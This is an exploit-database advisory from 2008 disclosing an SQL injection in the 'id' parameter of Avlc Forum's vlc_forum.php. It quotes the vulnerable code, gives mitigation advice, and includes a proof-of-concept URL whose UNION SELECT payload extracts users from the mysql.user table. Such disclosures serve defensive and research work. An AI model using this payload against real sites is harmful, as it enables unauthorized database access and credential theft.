Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

vendor:

Avlc Forum

by:

CWH Underground

8.8

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Avlc Forum

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

A vulnerability exists in Avlc Forum due to improper sanitization of user-supplied input in the 'id' parameter of the 'vlc_forum.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database, allowing for the manipulation or disclosure of arbitrary data.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

====================================================================
  Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
====================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 12 July 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Avlc Forum
 VERSION     : N/A
 VENDOR	     : N/A
 DOWNLOAD    : http://www.easy-script.com/compt.php?id=2147
#####################################################

-- Remote SQL Injection ---

---------------------------------
 Vulnerable File [vlc_forum.php]
---------------------------------

@Line

   141:  $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
   142:  $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());


-------------
 POC Exploit
-------------

[+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--


#####################################################################
 Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   
 Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-07-12]